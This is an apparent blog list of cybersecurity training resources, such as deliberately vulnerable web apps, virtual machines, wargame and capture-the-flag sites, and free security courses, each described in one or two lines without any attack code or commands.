Damn Vulnerable Web App Damn Vulnerable Web App (DVWA) is a PHP/MySQL web application that is damn vulnerable. Its main goals are to be an aid for security professionals to test their skills and tools in a legal environment, help web developers better understand the processes of securing web applications and aid teachers/students to teach/learn web application security in a class room environment.

Damn Vulnerable Web Services Damn Vulnerable Web Services is an insecure web application with multiple vulnerable web service components that can be used to learn real world web service vulnerabilities.

Damn Vulnerable Web Sockets Damn Vulnerable Web Sockets (DVWS) is a vulnerable web application which works on web sockets for client-server communication.

Damnvulnerable.me A deliberately vulnerable modern day app with lots of DOM-related bugs.

Dareyourmind Online game, hacker challenge.

DIVA Android Damn Insecure and vulnerable App for Android.

EnigmaGroup Safe security resource, trains in exploits listed in the OWASP Top 10 Project and teach members the many other types of exploits that are found in today's applications.

ENISA Training Material The European Union Agency for Network and Information Security (ENISA) Cyber Security Training. You will find training materials, handbooks for teachers, toolsets for students and Virtual Images to support hands-on training sessions.

exploit.co.il Vulnerable Web App exploit.co.il Vulnerable Web app designed as a learning platform to test various SQL injection Techniques.

Exploit-exercises.com exploit-exercises.com provides a variety of virtual machines, documentation and challenges that can be used to learn about a variety of computer security issues such as privilege escalation, vulnerability analysis, exploit development, debugging, reverse engineering, and general cyber security issues.

ExploitMe Mobile Set of labs and a exploitable framework for you to hack mobile a application on Android.

Game of Hacks This game was designed to test your application hacking skills. You will be presented with vulnerable pieces of code and your mission if you choose to accept it is to find which vulnerability exists in that code as quickly as possible.

GameOver Project GameOver was started with the objective of training and educating newbies about the basics of web security and educate them about the common web attacks and help them understand how they work.

Gh0stlab A security research network where like-minded individuals could work together towards the common goal of knowledge.

GoatseLinux GSL is a Vmware image you can run for penetration testing purposes.

Google Gruyere Labs that cover how an application can be attacked using common web security vulnerabilities, like cross-site scripting vulnerabilities (XSS) and cross-site request forgery (XSRF). Also you can find labs how to find, fix, and avoid these common vulnerabilities and other bugs that have a security impact, such as denial-of-service, information disclosure, or remote code execution.

Hack This Site More than just another hacker wargames site, Hack This Site is a living, breathing community with many active projects in development, with a vast selection of hacking articles and a huge forum where users can discuss hacking, network security, and just about everything.

Hack Yourself First This course is designed to help web developers on all frameworks identify risks in their own websites before attackers do and it uses this site extensively to demonstrate risks.

Hack.me Hack.me aims to be the largest collection of "runnable" vulnerable web applications, code samples and CMS's online. The platform is available without any restriction to any party interested in Web Application Security.

Hackademic Offers realistic scenarios full of known vulnerabilities (especially, of course, the OWASP Top Ten) for those trying to practice their attack skills.

Hackazon A modern vulnerable web app.

Hackertest.net HackerTest.net is your own online hacker simulation with 20 levels.

Hacking-Lab Hacking-Lab is an online ethical hacking, computer network and security challenge platform, dedicated to finding and educating cyber security talents. Furthermore, Hacking-Lab is providing the CTF and mission style challenges for the European Cyber Security Challenge with Austria, Germany, Switzerland, UK, Spain, Romania and provides free OWASP TOP 10 online security labs.

HackSys Extreme Vulnerable Driver HackSys Extreme Vulnerable Driver is intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level.

HackThis!! Test your skills with 50+ hacking levels, covering all aspects of security.

Hackxor Hackxor is a web app hacking game where players must locate and exploit vulnerabilities to progress through the story. Think WebGoat but with a plot and a focus on realism&difficulty. Contains XSS, CSRF, SQLi, ReDoS, DOR, command injection, etc.

Halls of Valhalla Challenges you can solve. Valhalla is a place for sharing knowledge and ideas. Users can submit code, as well as science, technology, and engineering-oriented news and articles.

Hax.Tor Provides numerous interesting “hacking” challenges to the user.

Hellbound Hackers Learn a hands-on approach to computer security. Learn how hackers break in, and how to keep them out.

Holynix Holynix is an Linux VMware image that was deliberately built to have security holes for the purposes of penetration testing.

HSCTF3 HSCTF is an international online hacking competition designed to educate high schoolers in computer science.

Information Assurance Support Environment (IASE) Great site with Cybersecurity Awareness Training, Cybersecurity Training for IT Managers, Cybersecurity Training for Cybersecurity Professionals, Cybersecurity Technical Training, NetOps Training, Cyber Law Awareness, and FSO Tools Training available online.

InfoSec Institute Free CISSP Training course.

ISC2 Center for Cyber Safety and Education Site to empower students, teachers, and whole communities to secure their online life through cyber security education and awareness with the Safe and Secure Online educational program; information security scholarships; and industry and consumer research.

Java Vulnerable Lab Vulnerable Java based Web Application.

Juice Shop OWASP Juice Shop is an intentionally insecure web app for security trainings written entirely in Javascript which encompasses the entire OWASP Top Ten and other severe security flaws.

Ka0labs Here you will find jeopardy-style challenges without stressful time-limits of regular CTFs.

Kioptrix VM This vulnerable machine is a good starting point for beginners.

LAMPSecurity Training LAMPSecurity training is designed to be a series of vulnerable virtual machine images along with complementary documentation designed to teach Linux,apache,PHP,MySQL security.

Magical Code Injection Rainbow The Magical Code Injection Rainbow! MCIR is a framework for building configurable vulnerability testbeds. MCIR is also a collection of configurable vulnerability testbeds.

McAfee HacMe Sites Search the page for HacMe and you'll find a suite of learning tools.

Metasploit Unleashed Free Ethical Hacking Course.

Metasploitable 3 Metasploitable3 is a VM that is built from the ground up with a large amount of security vulnerabilities.

Microcorruption CTF Challenge: given a debugger and a device, find an input that unlocks it. Solve the level with that input.

Morning Catch Morning Catch is a VMware virtual machine, similar to Metasploitable, to demonstrate and teach about targeted client-side attacks and post-exploitation.

Moth Moth is a VMware image with a set of vulnerable Web Applications and scripts.

Mutillidae OWASP Mutillidae II is a free, open source, deliberately vulnerable web application providing a target for web-security enthusiast.

MysteryTwister C3 MysteryTwister C3 lets you solve crypto challenges, starting from the simple Caesar cipher all the way to modern AES, they have challenges for everyone.

National Institutes of Health (NIH) Short courses on Information Security and Privacy Awareness. They have a section for executives, managers and IT Administrators as well.

Overthewire The wargames offered by the OverTheWire community can help you to learn and practice security concepts in the form of fun-filled games.

OWASP Broken Web Applications Project OWASP Broken Web Applications Project is a collection of vulnerable web applications that is distributed on a Virtual Machine.

OWASP GoatDroid OWASP GoatDroid is a fully functional and self-contained training environment for educating developers and testers on Android security. GoatDroid requires minimal dependencies and is ideal for both Android beginners as well as more advanced users.

OWASP iGoat iGoat is a learning tool for iOS developers (iPhone, iPad, etc.).

OWASP Mutillidae II OWASP Mutillidae II is a free, open source, deliberately vulnerable web-application providing a target for web-security enthusiast.

OWASP Security Shepherd The OWASP Security Shepherd project is a web and mobile application security training platform.

OWASP SiteGenerator OWASP SiteGenerator allows the creating of dynamic websites based on XML files and predefined vulnerabilities (some simple, some complex) covering .Net languages and web development architectures (for example, navigation: Html, Javascript, Flash, Java, etc...).

Pentesterlab This exercise explains how you can, from a SQL injection, gain access to the administration console, then in the administration console, how you can run commands on the system.

Pentestit.ru Pentestit.ru has free labs that emulate real IT infrastructures. It is created for practising legal pen testing and improving penetration testing skills. OpenVPN is required to connect to the labs.

Peruggia Peruggia is designed as a safe, legal environment to learn about and try common attacks on web applications. Peruggia looks similar to an image gallery, but contains several controlled vulnerabilities to practice on.

PicoCTF picoCTF is a computer security game targeted at middle and high school students. The game consists of a series of challenges centered around a unique storyline where participants must reverse engineer, break, hack, decrypt, or do whatever it takes to solve the challenge.

Professor Messer Good free training video's, not only on Security, but on CompTIA A+, Network and Microsoft related as well.

Puzzlemall PuzzleMall - A vulnerable web application for practicing session puzzling.

Pwnable.kr 'pwnable.kr' is a non-commercial wargame site which provides various pwn challenges regarding system exploitation. while playing pwnable.kr, you could learn/improve system hacking skills but that shouldn't be your only purpose.

Pwnerrank A Capture The Flag platform dedicated to information security learning, training and practicing by solving a set challenges.

Pwnos PwnOS is a vulnerable by design OS .. and there are many ways you can hack it.

Reversing.kr This site tests your ability to Cracking & Reverse Code Engineering.

Ringzero Challenges you can solve and gain points.

Risk3Sixty Free Information Security training video, an information security examination and the exam answer key.

Root Me Hundreds of challenges and virtual environments. Each challenge can be associated with a multitude of solutions so you can learn.

RPISEC/MBE Modern Binary Exploitation Course materials.

RPISEC/Malware Malware Analysis Course materials.

SANS Cyber Aces SANS Cyber Aces Online makes available, free and online, selected courses from the professional development curriculum offered by The SANS Institute, the global leader in cyber security training.

Scene One Scene One is a pen testing scenario liveCD made for a bit of fun and learning.

SEED Labs The SEED project has labs on Software, Network, Web, Mobile and System security and Cryptography labs.

SentinelTestbed Vulnerable website. Used to test sentinel features.

SG6 SecGame Spanish language, vulnerable GNU/Linux systems.

SlaveHack My personal favorite : Slavehack is a virtual hack simulation game. Great for starters, I've seen kids in elementary school playing this!

SlaveHack 2 BETA Slavehack 2 is a sequel on the original Slavehack. It's also a virtual hack simulation game but you will find features much more closer to today's Cyber reality.

Smashthestack This network hosts several different wargames, ranging in difficulty. A wargame, in this context, is an environment that simulates software vulnerabilities and allows for the legal execution of exploitation techniques.

SocketToMe SocketToMe SocketToMe is little application for testing web sockets.

SQLI labs SQLI labs to test error based, Blind boolean based, Time based.

Sqlilabs Lab set-up for learning SQL Injection Techniques.

SQLzoo Try your Hacking skills against this test system. It takes you through the exploit step-by-step.

Stanford SecuriBench Stanford SecuriBench is a set of open source real-life programs to be used as a testing ground for static and dynamic security tools. Release .91a focuses on Web-based applications written in Java.

The ButterFly - Security Project The ButterFly project is an educational environment intended to give an insight into common web application and PHP vulnerabilities. The environment also includes examples demonstrating how such vulnerabilities are mitigated.

ThisIsLegal A hacker wargames site but also with much more.

Try2Hack Try2hack provides several security-oriented challenges for your entertainment. The challenges are diverse and get progressively harder.

UltimateLAMP UltimateLAMP is a fully functional environment allowing you to easily try and evaluate a number of LAMP stack software products without requiring any specific setup or configuration of these products.

Vicnum Vicnum is an OWASP project consisting of vulnerable web applications based on games commonly used to kill time. These applications demonstrate common web security problems such as cross-site scripting, SQL injections, and session management issues.

Vulnhub An extensive collection of vulnerable VMs with user-created solutions.

Vulnix A vulnerable Linux host with configuration weaknesses rather than purposely vulnerable software versions.

Vulnserver Windows based threaded TCP server application that is designed to be exploited.

W3Challs W3Challs is a penetration testing training platform, which offers various computer challenges, in categories related to security

WackoPicko WackoPicko is a vulnerable web application used to test web application vulnerability scanners.

Web Attack and Exploitation Distro WAED is pre-configured with various real-world vulnerable web applications in a sandboxed environment. It includes pen testing tools as well.

Web Security Dojo Web Security Dojo is a preconfigured, stand-alone training environment for Web Application Security.

WebGoat WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons. You can install and practice with WebGoat.

Wechall Focussed on offering computer-related problems. You will find Cryptographic, Crackit, Steganography, Programming, Logic and Math/Science. The difficulty of these challenges vary as well.

XSS-game In this training program, you will learn to find and exploit XSS bugs. You'll use this knowledge to confuse and infuriate your adversaries by preventing such bugs from happening in your applications.

XVWA XVWA is a badly coded web application written in PHP/MySQL that helps security enthusiasts to learn application security.

Διαβάστε Περισσότερα »
Related Posts Plugin for WordPress, Blogger...